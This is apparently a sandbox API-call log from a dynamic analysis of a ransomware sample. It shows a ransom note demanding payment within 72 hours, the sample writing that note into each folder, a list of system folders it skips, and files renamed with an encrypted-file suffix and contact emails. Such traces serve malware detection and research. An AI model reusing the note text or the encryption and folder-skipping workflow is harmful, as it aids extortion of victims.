NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0183.475] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0183.478] CloseHandle (hObject=0x388) returned 1
	[0183.478] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.478] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.479] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.479] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0183.481] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0183.481] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.481] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0183.481] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0183.481] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0183.481] CloseHandle (hObject=0x388) returned 1
	[0183.482] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d658f0, ftCreationTime.dwHighDateTime=0x1d975a6, ftLastAccessTime.dwLowDateTime=0x86dc711f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86e39a97, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0183.483] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\*.*") returned 51
	[0183.483] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.483] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*") returned 0x33
	[0183.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.484] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="windows") returned 0x0
	[0183.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.484] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="boot") returned 0x0
	[0183.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.484] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="system volume information") returned 0x0
	[0183.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.484] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0183.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.485] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="temp") returned 0x0
	[0183.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.485] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="program files") returned 0x0
	[0183.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.485] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="program files (x86)") returned 0x0
	[0183.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.485] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="appdata") returned 0x0
	[0183.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.486] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="application data") returned 0x0
	[0183.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.486] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="winnt") returned 0x0
	[0183.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.486] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="tmp") returned 0x0
	[0183.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.486] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="cache") returned 0x0
	[0183.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.487] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="temporary internet files") returned 0x0
	[0183.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.487] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="webcache") returned 0x0
	[0183.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.487] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="inetcache") returned 0x0
	[0183.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.488] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="nvidia") returned 0x0
	[0183.488] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.488] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="packages") returned 0x0
	[0183.488] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.488] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="cookies") returned 0x0
	[0183.488] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.488] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\*.*", lpSrch="programdata") returned 0x0
	[0183.489] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0183.489] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0183.489] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d658f0, ftCreationTime.dwHighDateTime=0x1d975a6, ftLastAccessTime.dwLowDateTime=0x86dc711f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86e39a97, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0183.489] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0183.489] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15baac0, ftCreationTime.dwHighDateTime=0x1d96676, ftLastAccessTime.dwLowDateTime=0xad1ca850, ftLastAccessTime.dwHighDateTime=0x1d96a98, ftLastWriteTime.dwLowDateTime=0xad1ca850, ftLastWriteTime.dwHighDateTime=0x1d96a98, nFileSizeHigh=0x0, nFileSizeLow=0x13a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="2CxFdQB88_e1S3.avi", cAlternateFileName="2CXFDQ~1.AVI")) returned 1
	[0183.489] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86a86ee7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86a86ee7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86a86ee7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="cjiotqynzcd.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CJIOTQ~1.SCL")) returned 1
	[0183.489] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86ad31fb, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86ad31fb, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86af9754, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x12f40, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqgw.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="EQGWJP~1.SCL")) returned 1
	[0183.489] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86b6bdc7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86b6bdc7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86b6bdc7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xdfb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fbjw5d4nfat2adqd tg.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="FBJW5D~1.SCL")) returned 1
	[0183.489] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e39a97, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86e39a97, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86e39a97, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0183.489] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e135c5, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86e135c5, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86e39a97, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0183.490] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86bde392, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86bde392, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86bde392, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x17c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ngcmroclewn1vtz.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="NGCMRO~1.SCL")) returned 1
	[0183.490] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86c2aa1a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86c2aa1a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86c2aa1a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vosdngzxdazzxi9nibz.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="VOSDNG~1.SCL")) returned 1
	[0183.490] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86ce245b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86ce245b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86ce245b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="zx28zquixc5h.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="ZX28ZQ~1.SCL")) returned 1
	[0183.490] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86d2eb24, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86d2eb24, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86da0eec, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x90a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_uplqiqusdinydia4xz-.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="_UPLQI~1.SCL")) returned 1
	[0183.490] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86d2eb24, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86d2eb24, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86da0eec, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x90a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_uplqiqusdinydia4xz-.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="_UPLQI~1.SCL")) returned 0
	[0183.490] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0183.490] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0183.491] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86870d18, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86870d18, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86896f63, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x3bb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yipzjstuvo.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="YIPZJS~1.SCL")) returned 1
	[0183.491] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x868bd7a4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x868bd7a4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x868bd7a4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x141d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="z02m6kpvhtj.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="Z02M6K~1.SCL")) returned 1
	[0183.491] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x868bd7a4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x868bd7a4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x868bd7a4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x141d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="z02m6kpvhtj.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="Z02M6K~1.SCL")) returned 0
	[0183.491] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0183.491] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce9c2cb0, ftCreationTime.dwHighDateTime=0x1d96662, ftLastAccessTime.dwLowDateTime=0x668341a0, ftLastAccessTime.dwHighDateTime=0x1d96cec, ftLastWriteTime.dwLowDateTime=0x668341a0, ftLastWriteTime.dwHighDateTime=0x1d96cec, nFileSizeHigh=0x0, nFileSizeLow=0xb8b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="bL1hC.avi", cAlternateFileName="")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b7a027, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85b7a027, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85b7a027, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9750, dwReserved0=0x0, dwReserved1=0x0, cFileName="bsfe7m1kwbyp y.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="BSFE7M~1.SCL")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aadb2a0, ftCreationTime.dwHighDateTime=0x1d96ae3, ftLastAccessTime.dwLowDateTime=0x7c61ab00, ftLastAccessTime.dwHighDateTime=0x1d96cbb, ftLastWriteTime.dwLowDateTime=0x7c61ab00, ftLastWriteTime.dwHighDateTime=0x1d96cbb, nFileSizeHigh=0x0, nFileSizeLow=0xd61e, dwReserved0=0x0, dwReserved1=0x0, cFileName="cXUEzcNf.avi", cAlternateFileName="")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85bc6623, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85bc6623, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85bc6623, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xebb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-efjesby.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="D-EFJE~1.SCL")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c85102, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x85c85102, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x85fa61db, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x15fa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dglt_u_s.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="DGLT_U~1.SCL")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x860d7548, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x860d7548, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x860fd59c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x112e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="evfxh0jnzn86.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="EVFXH0~1.SCL")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b9b450, ftCreationTime.dwHighDateTime=0x1d96b0d, ftLastAccessTime.dwLowDateTime=0x31531800, ftLastAccessTime.dwHighDateTime=0x1d96fa0, ftLastWriteTime.dwLowDateTime=0x31531800, ftLastWriteTime.dwHighDateTime=0x1d96fa0, nFileSizeHigh=0x0, nFileSizeLow=0xdb23, dwReserved0=0x0, dwReserved1=0x0, cFileName="gcfaL.avi", cAlternateFileName="")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f05ee0, ftCreationTime.dwHighDateTime=0x1d9765a, ftLastAccessTime.dwLowDateTime=0x511ca420, ftLastAccessTime.dwHighDateTime=0x1d97690, ftLastWriteTime.dwLowDateTime=0x511ca420, ftLastWriteTime.dwHighDateTime=0x1d97690, nFileSizeHigh=0x0, nFileSizeLow=0x8f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="gHWknTr.avi", cAlternateFileName="")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8678bf2c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8678bf2c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x867b1eee, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8678bf2c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8678bf2c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8678bf2c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0183.492] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862cc627, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x862cc627, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x862cc627, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9060, dwReserved0=0x0, dwReserved1=0x0, cFileName="jtooxm buypxvtbqv.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="JTOOXM~1.SCL")) returned 1
	[0183.493] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49efea10, ftCreationTime.dwHighDateTime=0x1d96eeb, ftLastAccessTime.dwLowDateTime=0xbd462400, ftLastAccessTime.dwHighDateTime=0x1d9761d, ftLastWriteTime.dwLowDateTime=0xbd462400, ftLastWriteTime.dwHighDateTime=0x1d9761d, nFileSizeHigh=0x0, nFileSizeLow=0x93b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="kXRID- cwUq07pxV_.avi", cAlternateFileName="KXRID-~1.AVI")) returned 1
